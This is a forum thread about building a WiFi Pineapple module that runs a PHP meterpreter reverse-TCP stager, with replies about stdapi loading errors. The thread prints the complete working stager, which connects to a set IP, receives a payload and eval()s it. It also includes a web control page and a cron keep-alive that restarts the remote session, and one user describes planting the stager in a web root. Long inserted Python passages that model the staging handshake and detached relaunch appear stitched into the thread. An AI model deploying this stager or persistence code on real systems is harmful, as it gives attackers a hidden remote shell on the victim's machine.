Darren Kitchen, posted June 15, 2012:

So I've been working on a meterpreter module and it's 6:00 here, so I figured I'd post my work-in-progress. Here's a screenshot of it in action using Armitage / Cobalt Strike (front-end for Metasploit): And here's a pic of the module WIP:

It's based off the PHP Meterpreter. To test it, launch msfconsole and use the php/meterpreter_reverse_tcp payload. Or from BT5 R2 start Armitage, hit Yes to start MSF and give it a minute, then from the tree in the top left double-click payload > php > meterpreter_reverse_tcp, set your IP and port and launch. Then on the Pineapple, from a shell, issue "php tt.php", ensuring that the first few lines of tt.php reference said IP and port.

Here's the php meterpreter:

<?php
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '172.16.42.42';
$port = 4445;
$ipf = AF_INET;
if (FALSE !== strpos($ip, ":")) {
    # ipv6 requires brackets around the address
    $ip = "[". $ip ."]";
    $ipf = AF_INET6;
}
# Use whichever socket API this PHP build exposes, most capable first.
if (($f = 'stream_socket_client') && is_callable($f)) {
    $s = $f("tcp://{$ip}:{$port}");
    $s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
    $s = $f($ip, $port);
    $s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
    $s = $f($ipf, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) { die(); }
    $s_type = 'socket';
} else {
    die('no socket funcs');
}
if (!$s) { die('no socket'); }
# First 4 bytes from the handler: big-endian length of the stage that follows.
switch ($s_type) {
    case 'stream': $len = fread($s, 4); break;
    case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
    # We failed on the main socket. There's no way to continue, so
    # bail
    die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
# Accumulate until the whole stage has arrived; short reads are normal.
# (PHP variables are case-sensitive: the buffer must be $b throughout, or
# strlen() of an undefined name is 0 and this loop never ends.)
while (strlen($b) < $len) {
    switch ($s_type) {
        case 'stream': $b .= fread($s, $len-strlen($b)); break;
        case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
    }
}
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
?>

Just change IP and Port above to what you're using.

The biggest problem I've had with the module so far is getting it to fork properly. I've tried using "| at now" and even empty (not the greatest since it has a timeout). Even went as far as writing a meterpreter-keepalive.sh which would run by cron every minute.

Here's the code:

meterpreter.php

<?php
if (isset($_GET['start'])) {
    echo "<pre>Starting Meterpreter</pre>";
    exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");
    // if (exec("ps aux | grep \"[s]tart-meterpreter.sh\"") == "") {
    //     exec("empty -f -i /tmp/meterpreter.in -o /tmp/meterpreter.out -p /tmp/meterpreter.pid -L /tmp/meterpreter.log /www/pineapple/modules/meterpreter/start-meterpreter.sh");
    // } else {
    //     echo "<pre><b>Meterpreter already running</b></pre>";
    // }
}

// Only ever write the one script this page edits. Taking the path from the
// POSTed form would let any request to this page overwrite arbitrary files
// as the web server user.
$filename = "/www/pineapple/modules/meterpreter/tt.php";
$newdata = isset($_POST['newdata']) ? $_POST['newdata'] : "";
if ($newdata != "") {
    // Drop the carriage returns the browser adds to textarea input.
    $newdata = str_replace("\r", "", $newdata);
    $fw = fopen($filename, 'w') or die('Could not open file!');
    fwrite($fw, stripslashes($newdata)) or die('Could not write to file');
    fclose($fw);
    $fileMessage = "Updated " . $filename . "<br /><br />";
}
?>
<html>
<head>
<title>Pineapple Control Center</title>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<link rel="stylesheet" type="text/css" href="/pineapple/includes/styles.css" />
<link rel="icon" href="/pineapple/favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="/pineapple/favicon.ico" type="image/x-icon">
</head>
<body>
<?php include_once("/www/pineapple/includes/navbar.php"); ?>
<br><br>
<center>
<table width="50%">
<tr><td>
<div class=news>
<div class=moduleTitle><b>Configuration</b></div>
<div class=moduleContent>
Edit IP address and Port below to match that of your metasploit session.
<?php
$filename = "/www/pineapple/modules/meterpreter/tt.php";
$fh = fopen($filename, "r") or die("Could not open file!");
$data = fread($fh, filesize($filename)) or die("Could not read file!");
fclose($fh);
// Escape both the script source and PHP_SELF so neither can break out of
// the textarea or the form action attribute.
$self = htmlspecialchars($_SERVER['PHP_SELF']);
echo "<form action='$self' method='post'>
<textarea name='newdata' rows='20' style='min-width:100%; background-color:black; color:white; border-style:dashed;'>" . htmlspecialchars($data) . "</textarea>
<br><center><input type='submit' value='Update Meterpreter Script'>
</form>";
?>
</div>
<br>
<div class=moduleTitle>Meterpreter Configuration</div>
<div class=moduleContent>
This keep alive script will restart the Meterpreter session if it drops connection.
</div>
</div>
</td></tr></table></center>
</body>
</html>

meterpreter-keepalive.sh

#!/bin/sh
# -------------------------------------------------
# Simple keep alive script for meterpreter sessions
# -------------------------------------------------
logger "Meterpreter: Keep-Alive Script Executed"
# pidof matches process names, not arguments, so "pidof php tt.php" is true
# whenever any php process exists; look for the script in the command line instead.
if ! ps w | grep -q "[t]t.php"; then
    # Detach from cron's session and stdio so the child is neither hung up
    # when cron reaps this script nor blocked on an inherited pipe.
    setsid php /www/pineapple/modules/meterpreter/tt.php </dev/null >/dev/null 2>&1 &
    logger "Meterpreter: Connection was down, restarted."
else
    logger "Meterpreter: Connection seems to be up."
fi

My code is rusty, having taken a month or so off, so I figured I'd post my work in progress. If started from a shell it works great. Just trying to pretty it up / pack it up. Lemme know what you think. I'm going to go look at the sky or something having nothing to do with computers for a few hours. Sure it'll come to me then...
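What tt.php actually does on the wire is short: connect back, read a 4-byte big-endian length (PHP's unpack("Nlen", ...)), read exactly that many bytes, and eval() them. The following is an added example, not Darren's code and not Metasploit's handler: a Python model of both ends of that exchange over loopback. The handler side is a stand-in that only speaks the framing; the stager side reproduces the read loop, and adds one check the PHP does not have, a cap on the length field, since the stager otherwise trusts whatever the handler (or anyone who can intercept the unauthenticated TCP connection) puts there. MAX_STAGE_LEN, the function names and the demo stage string are assumptions made for this example.

```python
"""Model of the staging handshake the tt.php stager implements.

Added example, not code from the post or from Metasploit.  The handler
side is a stand-in that only speaks the framing tt.php reads: a 4-byte
big-endian length, then exactly that many bytes of PHP source, which the
stager hands to eval().  The stager side reproduces the read loop, plus
a length cap the original does not have.
"""
import socket
import struct
import threading

# Upper bound on a stage we are willing to receive (assumption for this
# example).  The tt.php loop has no cap, so a hostile handler can make it
# spin on a huge length.
MAX_STAGE_LEN = 4 * 1024 * 1024


def frame_stage(stage: bytes) -> bytes:
    """Handler side: prefix the stage with its length, big-endian ("N" in PHP unpack)."""
    return struct.pack(">I", len(stage)) + stage


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes, looping on short reads like the while() in tt.php."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("handler closed the socket mid-stage")
        buf += chunk
    return buf


def read_stage(sock: socket.socket, max_len: int = MAX_STAGE_LEN) -> bytes:
    """Stager side: read the 4-byte length, validate it, then the stage body."""
    (length,) = struct.unpack(">I", recv_exact(sock, 4))
    if length == 0 or length > max_len:
        raise ValueError(f"refusing stage of {length} bytes")
    return recv_exact(sock, length)


def serve_one_stage(stage: bytes, srv: socket.socket) -> None:
    """Stand-in handler: accept one connection and push the framed stage."""
    try:
        conn, _ = srv.accept()
        with conn:
            # Send in two pieces so the client's short-read handling is exercised.
            framed = frame_stage(stage)
            conn.sendall(framed[:3])
            conn.sendall(framed[3:])
    except OSError:
        pass  # client went away early (e.g. rejected the length); nothing to do


def run_local_exchange(stage: bytes, max_len: int = MAX_STAGE_LEN) -> bytes:
    """Run handler and stager over loopback; return what the stager would eval()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.settimeout(5)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    t = threading.Thread(target=serve_one_stage, args=(stage, srv), daemon=True)
    t.start()
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=5) as cli:
            return read_stage(cli, max_len)
    finally:
        t.join(timeout=5)
        srv.close()


if __name__ == "__main__":
    # Constructed stand-in for a stage; a real handler sends the PHP meterpreter.
    demo = b'$GLOBALS["demo"] = "stage ran";'
    got = run_local_exchange(demo)
    print(frame_stage(demo)[:4].hex(), len(got), got == demo)
```

The stager side works the same way whether the bytes arrive in one read or several, which is why the stand-in handler deliberately splits its send. The length cap is the one behavioural difference from tt.php; the PHP would loop on a multi-gigabyte length until the connection dropped.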
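The forking trouble described in the post, and the fork-meterpreter.sh the module calls but the post does not include, come down to two things a child started from a CGI page or a cron job needs in order to outlive its parent: its own session (so the parent being reaped or hung up does not propagate) and no inherited stdio (so the CGI response is not held open by a pipe the child still has). This added example is not the post's script, and is in Python so it runs anywhere rather than the sh the Pineapple would use; it isolates that mechanism together with a pidfile so a periodic run can tell "still up" from "needs restart". DEMO_CMD, temp_pidfile_path and the function names are assumptions made for this example.

```python
"""Detached launch and keep-alive for a long-running stager.

Added example, not the post's fork-meterpreter.sh (which is not shown).
A process started from a CGI page or cron has to be put in its own
session and cut loose from the parent's stdio, or it dies with the
parent or blocks the parent's response.  A pidfile records what was
started so the next keep-alive run can decide whether to restart.
"""
import os
import signal
import subprocess
import sys
import tempfile
import time

# Constructed stand-in for "php tt.php": a process that just stays up.
DEMO_CMD = [sys.executable, "-c", "import time; time.sleep(30)"]

# Popen objects we started, kept so stop() can reap them instead of leaving zombies.
_children = {}


def temp_pidfile_path() -> str:
    """Fresh pidfile path for a demo run (the module would use a fixed /tmp path)."""
    fd, path = tempfile.mkstemp(prefix="keepalive-", suffix=".pid")
    os.close(fd)
    return path


def read_pidfile(path: str):
    """Return the recorded pid, or None if the file is missing or empty."""
    try:
        with open(path) as fh:
            text = fh.read().strip()
    except FileNotFoundError:
        return None
    return int(text) if text.isdigit() else None


def pid_alive(pid: int) -> bool:
    """Probe with signal 0: delivers nothing, but fails if the pid does not exist."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True  # exists, owned by someone else
    return True


def is_running(pidfile: str) -> bool:
    pid = read_pidfile(pidfile)
    return pid is not None and pid_alive(pid)


def launch_detached(cmd, pidfile: str) -> int:
    """Start cmd detached from our session and stdio; record its pid."""
    proc = subprocess.Popen(
        cmd,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        close_fds=True,          # do not hand the child the CGI socket or cron pipes
        start_new_session=True,  # setsid(): own session, no controlling terminal
    )
    _children[proc.pid] = proc
    with open(pidfile, "w") as fh:
        fh.write(f"{proc.pid}\n")
    return proc.pid


def ensure_running(cmd, pidfile: str):
    """One keep-alive tick: (False, pid) if already up, else (True, new pid)."""
    if is_running(pidfile):
        return False, read_pidfile(pidfile)
    return True, launch_detached(cmd, pidfile)


def stop(pidfile: str, timeout: float = 5.0) -> bool:
    """SIGTERM the recorded process, reap it, remove the pidfile. True if it was up."""
    pid = read_pidfile(pidfile)
    if pid is None or not pid_alive(pid):
        return False
    os.kill(pid, signal.SIGTERM)
    proc = _children.pop(pid, None)
    if proc is not None:
        proc.wait(timeout=timeout)  # our own child: reap it so it is not a zombie
    else:
        deadline = time.monotonic() + timeout
        while pid_alive(pid) and time.monotonic() < deadline:
            time.sleep(0.05)
    try:
        os.remove(pidfile)
    except FileNotFoundError:
        pass
    return True


if __name__ == "__main__":
    pf = temp_pidfile_path()
    print(ensure_running(DEMO_CMD, pf))  # (True, <pid>)
    print(ensure_running(DEMO_CMD, pf))  # (False, <same pid>)
    print(stop(pf))                      # True
```

On the Pineapple the same two steps in sh are setsid plus stdin, stdout and stderr redirected to /dev/null with the job backgrounded, provided the busybox build includes the setsid applet; the pidfile check replaces the name-only pidof test, which cannot distinguish tt.php from any other php process.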
Anton, posted June 15, 2012: Can't wait! Nice work!
Razzlerock, posted June 15, 2012: I saw your tweet this morning about this and it looks so very cool. Here is the YouTube link from your tweet for the other guys to view: The sky is the limit with this Pineapple and the dedicated team/forum. Razzlerock
sUbZeRo, posted June 15, 2012: Looking forward to this module! :)
TheOniVeritas, posted June 15, 2012: Very nice. I'm new to Metasploit; using Armitage I can't find any hosts. Is there a special config for the Pineapple?
Crazy52, posted June 15, 2012: I have to say I love watching the progress on the Pineapple, and this just makes it all the more epic.
zbenta, posted June 15, 2012: Way to go Darren.
telot, posted June 15, 2012: Even more cool... is Darren now using a Mac?! Has Paul brought you over to the dark side (the cool side imho)? Kidding aside, this looks like a great addition to the Pineapple. I think bringing more and more Metasploit into the fold only bolsters the Pineapple's e-rep; a lot of folks in the community nowadays look on wifi hacks as almost passé. This kind of Metasploit integration will lend credence to the fact that wifi is a great attack vector and very much worth not overlooking. Thanks Darren! telot
Anton, posted June 15, 2012: Hey guys, Armitage & Cobalt Strike: why is one expensive and for Windows only and the other one free, lol? They look like they do the exact same job, not to mention they look identical. Are there any major differences that justify spending the big bucks for Cobalt Strike? Cheers, Anton.
Darren Kitchen, posted June 15, 2012: Think Red Hat Enterprise vs CentOS.
HakenDecker, posted June 15, 2012: That PHP is beer-worthy.
Anton, posted June 15, 2012, quoting Darren: "Think Red Hat Enterprise vs CentOS." Ah, I gotcha, cheers.
Battery_, posted August 25, 2012: Are there any updates?
Battery_, posted August 26, 2012: So I got this working, sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php. So when I browse to m.php I get my evil-looking Linux icon in Armitage and get my meterpreter session. However, whenever I try to make a pivot or anything I get "loading stdapi. Try command again later". Anyone else have that issue?
Hackrylix, posted September 24, 2012: Hi Darren, do you have some update to tease us? I'd like to understand better what you're trying to do. May we contribute together? Cheers!
blkik, posted December 2, 2012, quoting Battery_: "So I got this working, sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php. So when I browse to m.php I get my evil-looking Linux icon in Armitage and get my meterpreter session. However, whenever I try to make a pivot or anything I get "loading stdapi. Try command again later". Anyone else have that issue?"

I'm getting the same error. Thought it might be that Metasploit just needs time to load stdapi, but looking at the console, the load is actually timing out. Am I missing something? I did see that meterpreter comes back with a message as follows:

meterpreter > load stdapi
[*] Timed out waiting for command to complete

Lastly, the meterpreter.php file above contains the line:

exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");

but the code for this file doesn't appear to be on this page like the others (e.g. meterpreter-keepalive.sh).
BlackZero, posted December 5, 2012: Very nice, I can't wait for the module! Hope to see it soon in our modules :-)
airman_dopey, posted January 6, 2013: Also looking forward to checking this out. Hopefully it is still in the works....
icedevil433, posted March 11, 2013: Is there any update regarding what's been discussed above?

Quoting blkik: "I'm getting the same error. Thought it might be that Metasploit just needs time to load stdapi, but looking at the console, the load is actually timing out. Am I missing something? I did see that meterpreter comes back with a message as follows:

meterpreter > load stdapi
[*] Timed out waiting for command to complete

Lastly, the meterpreter.php file above contains the line:

exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");

but the code for this file doesn't appear to be on this page like the others (e.g. meterpreter-keepalive.sh)."
DuoM, posted June 21, 2013: Also looking for an update on the "can't load stdapi" error.
DuoM, posted June 23, 2013: Here's what I've tried: in Armitage, when firing up the php/meterpreter/reverse_tcp attack, under advanced options I set AutoLoadStdApi = 0, so that I could load it myself and see what happens. Running the exploit worked just fine; got my pwnd Pineapple and meterpreter shell. So I typed "load stdapi" and it says "loading stdapi extension..." and just sits there. Nothing happens. So I crack another shell and try it again, and it says "stdapi extension already loaded." Trying ping sweep or pivoting still yields the "loading stdapi. try command later" error. I'm not too familiar with where the code is to dive in and try to figure this out, so any advice would be appreciated. Thanks!
Sebkinne, posted June 24, 2013: I'll take a look at this module in the future. For now the development has stopped.